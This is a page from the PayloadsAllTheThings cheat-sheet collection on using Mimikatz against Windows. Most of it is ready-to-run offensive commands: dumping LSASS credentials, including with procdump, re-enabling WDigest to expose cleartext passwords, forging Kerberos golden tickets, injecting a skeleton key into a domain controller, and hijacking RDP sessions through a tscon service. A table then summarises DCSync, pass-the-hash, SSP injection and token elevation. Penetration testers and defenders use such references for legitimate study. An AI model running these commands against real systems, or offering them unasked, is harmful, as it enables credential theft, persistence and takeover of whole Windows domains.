PayloadsAllTheThings/Methodology and Resources/Windows - Mimikatz.md
2019-11-26 23:39:14 +01:00

6 KiB
Raw Blame History

Windows - Mimikatz

Data in memory

Mimikatz - Execute commands

Only one command

PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

Mimikatz console (multiple commands)

PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest

Mimikatz - Extract passwords

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest

# to re-enable wdigest in Windows Server 2012+
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest 
# create a DWORD 'UseLogonCredential' with the value 1.

Mimikatz - Mini Dump

Dump the lsass process.

C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp

net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp

Then load it inside Mimikatz.

mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords

Mimikatz Golden ticket

.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit

Mimikatz Skeleton key

privilege::debug
misc::skeleton
# map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
# login as someone
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab

Mimikatz RDP session takeover

Run tscon.exe as the SYSTEM user, you can connect to any session without a password.

privilege::debug 
token::elevate 
ts::remote /id:2 
# get the Session ID you want to hijack
query user
create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack

Mimikatz commands

Command Definition
CRYPTO::Certificates list/export certificates
CRYPTO::Certificates list/export certificates
KERBEROS::Golden create golden/silver/trust tickets
KERBEROS::List list all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current users tickets.Similar to functionality of “klist”.
KERBEROS::PTT pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).
LSADUMP::DCSync ask a DC to synchronize an object (get password data for account). No need to run code on DC.
LSADUMP::LSA Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”
LSADUMP::SAM get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.
LSADUMP::Trust Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).
MISC::AddSid Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.
MISC::MemSSP Inject a malicious Windows SSP to log locally authenticated credentials.
MISC::Skeleton Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.
PRIVILEGE::Debug get debug rights (this or Local System rights is required for many Mimikatz commands).
SEKURLSA::Ekeys list Kerberos encryption keys
SEKURLSA::Kerberos List Kerberos credentials for all authenticated users (including services and computer account)
SEKURLSA::Krbtgt get Domain Kerberos service account (KRBTGT)password data
SEKURLSA::LogonPasswords lists all available provider credentials. This usually shows recently logged on user and computer credentials.
SEKURLSA::Pth Pass- theHash and Over-Pass-the-Hash
SEKURLSA::Tickets Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computers AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).
TOKEN::List list all tokens of the system
TOKEN::Elevate impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box
TOKEN::Elevate /domainadmin impersonate a token with Domain Admin credentials.

Powershell Mimikatz

Mimikatz in memory (no binary on disk) with :

More informations can be grabbed from the Memory with :

References